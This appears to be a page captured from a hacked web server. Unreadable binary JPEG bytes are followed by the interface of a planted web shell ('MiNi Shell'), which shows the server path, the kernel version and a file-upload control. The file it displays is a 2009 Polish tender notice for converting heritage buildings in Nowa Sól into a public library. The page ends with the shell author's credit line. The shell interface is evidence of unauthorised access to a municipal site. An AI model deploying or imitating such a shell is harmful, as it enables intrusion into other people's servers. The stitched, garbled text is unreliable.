JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090306/53608-N-2009.html

<p class="kh_header"><b>Nowa Sól: Przebudowa zabytkowych budynków i adaptacja terenu dla potrzeb Miejskiej Biblioteki Publicznej w Nowej Soli</b><br>
<b>Numer ogłoszenia: 53608 - 2009; data zamieszczenia: 06.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nowa Sól - Miasto , ul. M. J. Piłsudskiego 12, 67-100 Nowa Sól, woj. lubuskie, tel. 068 4590300, faks 068 4590358.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowasol.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa zabytkowych budynków i adaptacja terenu dla potrzeb Miejskiej Biblioteki Publicznej w Nowej Soli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie zadania p.n.  Przebudowa zabytkowych budynków i adaptacja terenu dla potrzeb Miejskiej Biblioteki Publicznej w Nowej Soli.
2. Przedmiot zamówienia obejmuje wykonanie przebudowy budynku przychodni na Miejską Bibliotekę Publiczną - Oddział dla Dorosłych oraz przebudowę wraz z rozbudową budynku RUM-u na Miejską Bibliotekę Publiczną - Oddział dla Dzieci przy                 ul. Bankowej 3 w Nowej Soli. 
3. Przebudowa budynku przychodni na Miejską Bibliotekę Publiczną - O dla Dorosłych. Jest to obiekt o charakterze zabytkowym, dwukondygnacyjny, całkowicie podpiwniczony z poddaszem użytkowym i nieużytkowym, wykonany w technologii tradycyjnej, pow. zabudowy 425,0 m2, kubatura 6252,0 m3, wys. 17,26 m. Zakres robót obejmuje między innymi:
a)	wymianę części istniejących stropów nad piwnicą, parterem i piętrem - projektowane stropy: płyta żelbetowa na belkach stalowych,
b)	wykonanie podciągów stalowych,
c)	wymiana więźby dachowej - konstrukcja drewniana płatwiowo - kleszczowa na wzór istniejącej,
d)	wykonanie pokrycia dachowego z dachówki ceramicznej w koronkę,
e)	wykonanie szybu windowego osobowego i szybu towarowego, murowanego,
f)	wykonanie wewnątrz budynku dźwigu osobowego typu GMV o napędzie hydraulicznym, platformy schodowej dla osób niepełnosprawnych zamontowanej na biegu schodowym oraz pochylni zewnętrznych dla osób niepełnosprawnych,
g)	wykonanie dźwigu towarowego samonośnego typu ISO-A o napędzie elektrycznym,
h)	wyburzenie schodów zewnętrznych i przebudowa wejścia do piwnicy,
i)	wyburzenie części ścian wewnętrznych i postawienie nowych ścianek,
j)	skucie wszystkich tynków wewnętrznych i wykonanie nowych tynków wewnętrznych i malowanie ścian,
k)	wykonanie schodów zewnętrznych,
l)	wykonanie izolacji przeciwwilgociowych, przeciwwodnych, termicznych i akustycznych,
m)	wykonanie sufitów podwieszanych typu ROCFON i z płyt kartonowo gipsowych,
n)	demontaż posadzek i wykonanie nowych posadzek z płytek ceramicznych, lastrykowych i z paneli PCV,
o)	wykonanie stolarki drzwiowej i okiennej zgodnie z wykazem w dokumentacji,
p)	wykonanie renowacji balustrad oraz dodatkowych poręczy i podchwytów drewnianych,
q)	wykonanie rynien i rur spustowych z blachy tytanowo - cynkowej,
r)	montaż bramki akustomagnetycznej,
s)	uzupełnienie istniejących tynków zewnętrznych, wraz malowanie elewacji zewnętrznej farbami silikatowymi,
t) wykonanie instalacji w budynku:
4. Przebudowa i rozbudowa istniejącego budynku RUM-u na Miejską Bibliotekę Publiczną - O dla Dzieci. Jest to obiekt wybudowany w latach 70, parterowy, niepodpiwniczony z płaskim dachem dwuspadowym, wykonany w technologii tradycyjnej, pow. zabudowy 268,6 m2, Kubatura 1260,0 m3, wys. 6,75 m. Zakres robót obejmuje między innymi:
a)	demontaż istniejącego stropodachu i nadmurowanie ścian zewnętrznych do wys. 3,05m od posadzki, wykonanie stropu typu Teriva,
b)	wykonanie więźby dachowej drewnianej krokwiowo - płatwiowej i pokrycie dachu dachówką karpiówką w koronkę,
c)	demontaż istniejących posadzek i wykonanie nowych z płytek ceramicznych i paneli winylowych PCV,
d)	wyburzenia niektórych ścian i otworów w ścianach i wykonanie nowych ścian wewnętrznych i zewnętrznych murowanych,
e)	wymiana stolarki drzwiowej i okiennej,
f)	przebudowa schodów zewnętrznych i pochylni dla osób niepełnosprawnych,
g)	wykonanie izolacji przeciwwilgociowej i termicznej,
h)	ocieplenie budynku styropianem gr. 8 cm,
i)	wykonanie tynków wewnętrznych i zewnętrznych oraz malowanie ścian,
j)	wykonanie rynien i rur spustowych z blachy tytanowo - cynkowej,
k)	wykonanie instalacji
5. Zagospodarowanie terenów przyległych do budynków przyszłej Miejskiej Biblioteki Publicznej i Muzeum Miejskiego w Nowej Soli - dz. nr 604,dz. nr 603 2 oraz dz. nr 683 1 o łącznej powierzchni ok. 8732,0 m2. Zakres  robót obejmuje między innymi:
a)	wycinkę i usunięcie 13 szt. drzew oraz wykonanie cięć pielęgnacyjnych drzewostanu na terenie objętym przedmiotem zamówienia,
a)	rozbiórkę wewnętrznych ogrodzeń oraz naprawę, uzupełnienie lub wymianę elementów istniejącego ogrodzenia, a także zmianę ogrodzenia przy banku z płyt betonowych prefabrykowanych na ogrodzenie murowane z cegły klinkierowej,
b)	demontaż istniejących ławek i koszy,
c)	rozbiórkę budynku gospodarczego murowanego o kubaturze 86,3 m3,
d)	wykonanie amiteatrzyku na 90 miejsc, wraz ze sceną i lekkim zadaszeniem konstrukcji stalowej o pow. zabudowy 144m2, pow. sceny 41 m2,
e)	wykonanie podświetlanej fontanny z wykorzystaniem istniejącego obrzeża granitowego: fosa wyłożona vitromozaiką, z zamkniętym obiegiem wody, pow. zabudowy 33,0m2, 
f)	wykonanie pergoli, słupków z cegły klinkierowej, konstrukcji stelażu drewnianego, pow. zabudowy 37,0 m2,
g)	wykonanie basenika wodnego o konstrukcji żelbetowej, z zielenią wodną, obrzeże z płyt granitowych i vitromozaiki, pow. zabudowy 25 m2,
h)	wykonanie bram wejściowych na wzór istniejących bram oraz furtki,
i)	adaptacja budynku gospodarczego na zaplecze amfiteatru,
j)	wykonanie oświetlenia i montaż lamp parkowych żeliwnych,
k)	montaż ławek parkowych o konstrukcji żeliwnej, siedziska drewniane,
l)	wykonanie sieci elektrycznej kablowej do zasilania lamp parkowych, fontanny i baseniku,
m)	wykonanie sieci wodociągowej zasilającej fontannę i basenik,
n)	zakup i wykonanie zasadzenia drzew, krzewów i roślin bylinowych, żywopłotów, trawników zgodnie z projektem zieleni, pow. zabudowy 5587 m2,
o)	wykonanie dróg, placów, chodników o pow. 2234,0 m2, nawierzchnia z płyt kamiennych granitowych promieniowanych oraz kostki granitowej.	
6. Przedmiot zamówienia obejmuje zakup i dostarczenie wyposażenia do biblioteki - Oddział dla Dorosłych i Oddział dla Dzieci zgodnie z dokumentacją  techniczną aranżacji wnętrz i specyfikacją techniczną - umeblowanie pomieszczeń..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.26.27.00-8, 45.11.12.91-4, 45.31.10.00-0, 45.31.22.00-9, 45.31.21.00-0, 45.31.43.20-0, 45.31.61.00-6, 45.33.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 50.000 złotych (słownie: pięćdziesiąt tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tzn.:
- wykonali z należyta starannością, w okresie ostatnich 5 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwie roboty budowlane, z których każda polegała na budowie, przebudowie lub remoncie budynku o kubaturze min. 3.000 m3  o łącznej wartości minimum 2,5 mln zł,
- dysponują lub będą dysponować kierownikiem budowy, który posiada uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno - budowlanej będący członkiem właściwej Izby Inżynierów Budownictwa, posiadającym doświadczenie w pełnieniu funkcji kierownika budowy lub robót na najmniej dwóch zadaniach, z których każde polegało na budowie, przebudowie lub remoncie budynku o kubaturze min. 3.000 m3, 
- dysponują lub będą dysponować kierownikiem robót, który posiada uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno - budowlanej będący członkiem właściwej Izby Inżynierów Budownictwa i jest uprawniony do kierowania robotami budowlanymi przy zabytkach nieruchomych zgodnie z przepisami rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych,
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tzn.:
- posiadają środki finansowe lub zdolność kredytową w wysokości minimum     1 mln zł,
d) nie podlegają wykluczeniu z postępowania tzn.:
- nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.
2. Ocena spełniania warunków szczegółowych nastąpi na podstawie przedstawionych dokumentów i oświadczeń wyszczególnionych w pkt 10 SIWZ złożonych przez wykonawcę wraz z ofertą.
3. Sposób dokonywania oceny spełniania warunków wymaganych od wykonawców będzie oparty na zasadzie spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych zgodne z wzorem stanowiącym załącznik nr 2 do SIWZ. W przypadku składania oferty przez wykonawców występujących wspólnie, dokument ten musi być podpisany przez pełnomocnika do reprezentowania ich w niniejszym postępowaniu lub przez każdego z wykonawców.
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej, niż 6 miesięcy przed upływem terminu składania ofert. W przypadku składania oferty przez wykonawców występujących wspólnie, dokument ten musi być złożony przez każdego wykonawcę.
3. Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. W przypadku składania oferty przez wykonawców występujących wspólnie, dokumenty te muszą być złożone przez każdego wykonawcę.
4. Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania, zgodny ze wzorem stanowiącym załącznik nr 3 do SIWZ wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie.
5. Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia a także zakres wykonywanych przez nich czynności, zgodny z wzorem stanowiącym załącznik nr 4 do SIWZ.
6. Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wykonawca wskazał osoby, którymi będzie dysponował.
7. Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia wraz z aktualnym zaświadczeniem o ich przynależności do właściwej Izby Inżynierów Budownictwa.
8. Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca  posiada rachunek, potwierdzająca wysokość  posiadanych środków finansowych lub zdolność kredytową  wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.nowasol.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski 
ul. M. J. Piłsudskiego 12
67-100 Nowa Sól
pok. 109.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2009 godzina 10:00, miejsce: Urząd Miejski 
ul. M. J. Piłsudskiego 12
67-100 Nowa Sól
pok. 101 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com